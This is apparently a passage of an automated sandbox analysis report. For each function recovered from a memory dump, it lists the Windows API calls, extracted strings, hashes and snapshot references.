Opcode Fuzzy Hash: 8e7e1cc80aac08c6d0dbdfd698061a34665be99ec7da9b27b7dc99e8f03f62ec
Instruction Fuzzy Hash: 37518F71E00248AFDB22EFA8C984B9EB7A6EF05320F254191ED54E7791CB34ED45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D47AEC Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02D47F34: WindowFromPoint.USER32(-000000F7,?,00000000,02D47B06,?,-00000010,?), ref: 02D47F3A
Part of subcall function 02D47F34: GetParent.USER32(00000000), ref: 02D47F51

GetWindow.USER32(00000000,00000004), ref: 02D47B0E
GetCurrentThreadId.KERNEL32 ref: 02D47BE2
EnumThreadWindows.USER32(00000000,02D47A80,?), ref: 02D47BE8
GetWindowRect.USER32(00000000,?), ref: 02D47BFF
IntersectRect.USER32(?,?,?), ref: 02D47C6D

Part of subcall function 02D46F74: GetWindowThreadProcessId.USER32(?), ref: 02D46F81
Part of subcall function 02D46F74: GetCurrentProcessId.KERNEL32(?,00000000,?,02D43BE5,?,02D42CA1), ref: 02D46F8A
Part of subcall function 02D46F74: GlobalFindAtomA.KERNEL32(00000000), ref: 02D46F9F
Part of subcall function 02D46F74: GetPropA.USER32(?,00000000), ref: 02D46FB6

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
String ID:
API String ID: 2202917067-0
Opcode ID: 715d52806577cff175be30c50bc01b026de514494c1767f0e3225c7caf189ffd
Instruction ID: af0078bb60e4acc37ab896ff6f22f29fc4edb2f5db653e02e6979c399883da01
Opcode Fuzzy Hash: 715d52806577cff175be30c50bc01b026de514494c1767f0e3225c7caf189ffd
Instruction Fuzzy Hash: 72511A75A00209AFEB10DF6CD484BAEB7E5AF04354F1485A5E858EB751DB70EE41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4F8A0 Relevance: 7.6, APIs: 5, Instructions: 126COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 02D4F8CB
SaveDC.GDI32(00000000), ref: 02D4F904
ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,02D4F9C2,?,00000000), ref: 02D4F986
RestoreDC.GDI32(00000000,?), ref: 02D4F9BC
EndPaint.USER32(00000000,?,02D4FA06), ref: 02D4F9F9

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: e2f2db24fc100250923ce4a6eb05e87822fc1194eff4d3d7deb6dc3d213f533f
Instruction ID: 9d9c36d567b4ab19dff31fb7a9dddea283371d960a9213c2205e1d7c6e0e29f8
Opcode Fuzzy Hash: e2f2db24fc100250923ce4a6eb05e87822fc1194eff4d3d7deb6dc3d213f533f
Instruction Fuzzy Hash: 28416D71A04248AFDB08CBA8D854FAEBBF9FB48308F1545A9E90597B61CB74ED40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02D3FD1C Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d45afd9c8438c349edc7437de75a7350c597e324ab4f4c316e99c674916be7f
Instruction ID: 3761d3163f08f97dbc25c25578ccd818e7b62df9539a513876d525fe457efca3
Opcode Fuzzy Hash: 1d45afd9c8438c349edc7437de75a7350c597e324ab4f4c316e99c674916be7f
Instruction Fuzzy Hash: 75117961F0135D6EDB62BB39E908B9B669A9F41748F040068BD05EBB56CF28CC05CA60

Uniqueness

Uniqueness Score: -1.00%

Function 02D36140 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02D36196
GetDeviceCaps.GDI32(00000000,0000000C), ref: 02D361AB
GetDeviceCaps.GDI32(00000000,0000000E), ref: 02D361B5
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,02D34D03,00000000,02D34D8F), ref: 02D361D9
ReleaseDC.USER32(00000000,00000000), ref: 02D361E4

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: 90858d533284dc15cb0fdd07bfa99e6f036f5dc5830f504250558f03399241c7
Instruction ID: 2849e6c9582537618aa82ab992848a2c418582121c994d45e34a55771c1fabcf
Opcode Fuzzy Hash: 90858d533284dc15cb0fdd07bfa99e6f036f5dc5830f504250558f03399241c7
Instruction Fuzzy Hash: 17118121A452A9BEDB62EF34D8407EE7A9AFF41355F040225F8009A782D7B4CD94C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 02D60DE4 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 02D60E18
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 02D60E4A
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,02D5E548), ref: 02D60E83
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 02D60E9C
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,02D5E548), ref: 02D60EB2

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: 8ff35241cf1c743dc2c281303235e1d5526d92bb9a0fd4a35a1ad1af43543234
Instruction ID: 76eb616d61993c98e0f3fd849939eee722343d5a72c4d4185363415cb55532aa
Opcode Fuzzy Hash: 8ff35241cf1c743dc2c281303235e1d5526d92bb9a0fd4a35a1ad1af43543234
Instruction Fuzzy Hash: 4711A770A4437027DF126AF85C48B662A8E5B05325F0805B5BD94DA7D3CBB8CD04CF74

Uniqueness

Uniqueness Score: -1.00%

Function 02D33B54 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02D33B6C
GetDeviceCaps.GDI32(?,00000068), ref: 02D33B88
GetPaletteEntries.GDI32(61080E3A,00000000,00000008,?), ref: 02D33BA0
GetPaletteEntries.GDI32(61080E3A,00000008,00000008,?), ref: 02D33BB8
ReleaseDC.USER32(00000000,?), ref: 02D33BD4

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: bfb81f4f797bf7439ab22af59491fcce939a93830c409daf097912dd9cea483d
Instruction ID: c5eb97bc40df2433b15c0d6b9f78b7b143d3f2fc6be438b111b7c6f9a5f4b04a
Opcode Fuzzy Hash: bfb81f4f797bf7439ab22af59491fcce939a93830c409daf097912dd9cea483d
Instruction Fuzzy Hash: AF11A131A88204BEFB51DBA9EC42FA97BEDE705700F108495F6449AAC0DA769814CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02D1BB60 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02D1BBF7,?,?,00000000), ref: 02D1BB78

Part of subcall function 02D1B8D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D1B8F2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,02D1BBF7,?,?,00000000), ref: 02D1BBA8
EnumCalendarInfoA.KERNEL32(Function_0000BAAC,00000000,00000000,00000004), ref: 02D1BBB3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,02D1BBF7,?,?,00000000), ref: 02D1BBD1
EnumCalendarInfoA.KERNEL32(Function_0000BAE8,00000000,00000000,00000003), ref: 02D1BBDC

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 3150a053258ae7e48ca30383812676f70419cdff14543a635db92e1487fa81c5
Instruction ID: bda9afbf8e425b55c860dbbc1ce62c2cf4734f2065ccc0d4e9b314e356ba459d
Opcode Fuzzy Hash: 3150a053258ae7e48ca30383812676f70419cdff14543a635db92e1487fa81c5
Instruction Fuzzy Hash: 9401A7316046047BF701A774BD11F5A736DDF46718F510562F504D6FC4D5749E0086B4

Uniqueness

Uniqueness Score: -1.00%

Function 02D6251C Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 02D6252B
SetEvent.KERNEL32(00000000,02D64D36), ref: 02D62546
GetCurrentThreadId.KERNEL32 ref: 02D6254B
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,02D64D36), ref: 02D62560
CloseHandle.KERNEL32(00000000,00000000,02D64D36), ref: 02D6256B

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 1d7124a57a1f27d46e6604e22ed79f0de4ba1437013dd1f80bc8c7c05d0936bc
Instruction ID: 998583ca42dc25a8f42f9cbddfa3e8c44c8b81b6fbfe21fd2d0f5e91388431e8
Opcode Fuzzy Hash: 1d7124a57a1f27d46e6604e22ed79f0de4ba1437013dd1f80bc8c7c05d0936bc
Instruction Fuzzy Hash: 53F092B1D80200ABC769EAB8A858E2A37ABE744304F044D14A512C7F90D734DC61CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02D1BC10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,02D1BDE0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02D1BC3F

Part of subcall function 02D1B8D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D1B8F2

Strings

ggg, xrefs: 02D1BD25
yyyy, xrefs: 02D1BD35
eeee, xrefs: 02D1BD4E

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: dc45f93de268a913ee97b914064afd6e76b7635187c05842993b2a9169823cd4
Instruction ID: 69aa789168d8c63cbf8896f72c242d4006a3a5937ae0ec559e054b60fd43bf56
Opcode Fuzzy Hash: dc45f93de268a913ee97b914064afd6e76b7635187c05842993b2a9169823cd4
Instruction Fuzzy Hash: 1B41BE207081057BC715AAB9B9902BEB2A7DB8530CF544527E4A2C7F84EA34DD06DFB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D43444 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02D43492
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 02D434E4
DrawMenuBar.USER32(00000000), ref: 02D434F1

Strings

P, xrefs: 02D43484

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: c8fad7ac1c06a80bde1475d11a4fe9ba2ff4d2e9e34f0f1f0a1b7f06bc19f01e
Instruction ID: cafc62023767cb8947d1dcf5883a5b33dc544ab0b2f9e5b3820dcd6ce8c5a7bd
Opcode Fuzzy Hash: c8fad7ac1c06a80bde1475d11a4fe9ba2ff4d2e9e34f0f1f0a1b7f06bc19f01e
Instruction Fuzzy Hash: FA11B2702092006FE3909B2CCC81B8B76D5AB84314F6886A8F498C73D5DB39CC44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02D2FC1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02D2FC29
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D2FC2F

Strings

NtProtectVirtualMemory, xrefs: 02D2FC1F
C:\Windows\System32\ntdll.dll, xrefs: 02D2FC24

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: dc0193da9187e046212739f26de72ee431f2da53d062591906fe91cd5492b251
Instruction ID: c377bee0a7d17d4a6444dccd9a56073b43bf130bb541da3c28001fe0c9d65f87
Opcode Fuzzy Hash: dc0193da9187e046212739f26de72ee431f2da53d062591906fe91cd5492b251
Instruction Fuzzy Hash: A1E0BF75A40209BF9740DF98E985DCB37EDAB2C710B004400FA59D7700D671EC559BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D1D6B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,02D7910B,00000000,02D7911E), ref: 02D1D6B6
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02D1D6C7

Strings

GetDiskFreeSpaceExA, xrefs: 02D1D6C1
kernel32.dll, xrefs: 02D1D6B1

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: c8cee20868d2f6b6d9f0fbe165093c8b9eb9b6e50c98044c75318d94322d347d
Instruction ID: 7024024b593314360500a944e5642c546e4e282cbba8cab80ed1ee686becbd1c
Opcode Fuzzy Hash: c8cee20868d2f6b6d9f0fbe165093c8b9eb9b6e50c98044c75318d94322d347d
Instruction Fuzzy Hash: DCD09EA0A917897EFA00EBA474C061D23AAE750605F000629E41696B45E7BC8C29CA94

Uniqueness

Uniqueness Score: -1.00%

Function 02D4D4D8 Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 02D4D657
MulDiv.KERNEL32(?,?,?), ref: 02D4D692

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649ca5f4584e508e3d438254e8c5ef0ffb0e6f8f2d20b48fc529a9807e3e9b2d
Instruction ID: 546ae3b497c68efc6202fd2486d6362990c357e7c506b24c9356c5a64b828683
Opcode Fuzzy Hash: 649ca5f4584e508e3d438254e8c5ef0ffb0e6f8f2d20b48fc529a9807e3e9b2d
Instruction Fuzzy Hash: 45D14770A00A499FDB11CFB8C484BAABBF6FF49304F248959E4969B755CB30ED01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D4808C Relevance: 6.2, APIs: 4, Instructions: 212COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02D48101
GetDesktopWindow.USER32 ref: 02D48231
SetCursor.USER32(00000000), ref: 02D48286

Part of subcall function 02D53BDC: ImageList_EndDrag.COMCTL32(?,-00000010,02D48261), ref: 02D53BF8

SetCursor.USER32(00000000), ref: 02D48271

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CursorDesktopWindow$DragImageList_
String ID:
API String ID: 617806055-0
Opcode ID: c69f1626232e9c6b73d9a0d989b4b77a5a13cf54099e6d9239bb580742c0a6a4
Instruction ID: 95947600a4205307555ea5c56ef7cc84de75185e523f60da0b089b58ed2f432d
Opcode Fuzzy Hash: c69f1626232e9c6b73d9a0d989b4b77a5a13cf54099e6d9239bb580742c0a6a4
Instruction Fuzzy Hash: 2A915835A40A85CFCB04DF2CE584E557BE3BB99344F088995E888CBB66CB34EC55CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02D1F564 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D1F613
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D1F62F
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D1F6A6
VariantClear.OLEAUT32(?), ref: 02D1F6CF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: e75940ebfe500421c6d16b043615f9f8cb24f0dc0eb688c254715c00c45bee40
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 8341F876A01719AFCB61EF58D890BD9B3BDEB48214F0041D5E549E7B11DA34AF808F60

Uniqueness

Uniqueness Score: -1.00%

Function 02D1BE4C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D1BE69
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D1BE8D
GetModuleFileNameA.KERNEL32(02D10000,?,00000105), ref: 02D1BEA8
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D1BF3E

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: a6d4508fdaf5ba1b1d19d6516e8ce3fda755282bbc18e4457c59c3194436c693
Instruction ID: f9197419fcd232e6ead719667033d41c76972ad342ef6bf597d50f179bf07798
Opcode Fuzzy Hash: a6d4508fdaf5ba1b1d19d6516e8ce3fda755282bbc18e4457c59c3194436c693
Instruction Fuzzy Hash: C74129B1A00258ABDB21DB68EC84BDEB7FDAB08304F4400E6A608E7755D7759F84CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02D1BE4A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D1BE69
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D1BE8D
GetModuleFileNameA.KERNEL32(02D10000,?,00000105), ref: 02D1BEA8
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D1BF3E

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 5850efaaa086b173990135cfc117635e714ee24b3cf0fda9c2372ce070f23328
Instruction ID: 42b36706658d34554d1aa187bd93d9acd076f6639671f737fdfe39a85fbe4d33
Opcode Fuzzy Hash: 5850efaaa086b173990135cfc117635e714ee24b3cf0fda9c2372ce070f23328
Instruction Fuzzy Hash: 91411AB1A00258ABDB21DB68EC84BDEB7FDAB08304F4400E6A648E7755D7759F84CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02D614E4 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 02D61529
GetDC.USER32(00000000), ref: 02D6157E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 02D61588
ReleaseDC.USER32(00000000,00000000), ref: 02D61593

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID:
API String ID: 3331096196-0
Opcode ID: bdc07348d2cc41805e96fdce5d71df27bd7a3d7eb8b4e1736d0abbda0eb9a682
Instruction ID: 593f64a2c88b81af6aa00b5bb47eb2ac0c889bbd6f34358a1620ffcf0cd6399d
Opcode Fuzzy Hash: bdc07348d2cc41805e96fdce5d71df27bd7a3d7eb8b4e1736d0abbda0eb9a682
Instruction Fuzzy Hash: 1131F5B0A402409FD784EF2DE8C4B557BE6EB15318F4481A9E808CF766D636DC49CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02D34CB0 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 02D32E80: EnterCriticalSection.KERNEL32(02DAD3A0,00000000,02D31832,00000000,02D31891), ref: 02D32E88
Part of subcall function 02D32E80: LeaveCriticalSection.KERNEL32(02DAD3A0,02DAD3A0,00000000,02D31832,00000000,02D31891), ref: 02D32E95
Part of subcall function 02D32E80: EnterCriticalSection.KERNEL32(00000038,02DAD3A0,02DAD3A0,00000000,02D31832,00000000,02D31891), ref: 02D32E9E

Part of subcall function 02D36140: GetDC.USER32(00000000), ref: 02D36196
Part of subcall function 02D36140: GetDeviceCaps.GDI32(00000000,0000000C), ref: 02D361AB
Part of subcall function 02D36140: GetDeviceCaps.GDI32(00000000,0000000E), ref: 02D361B5
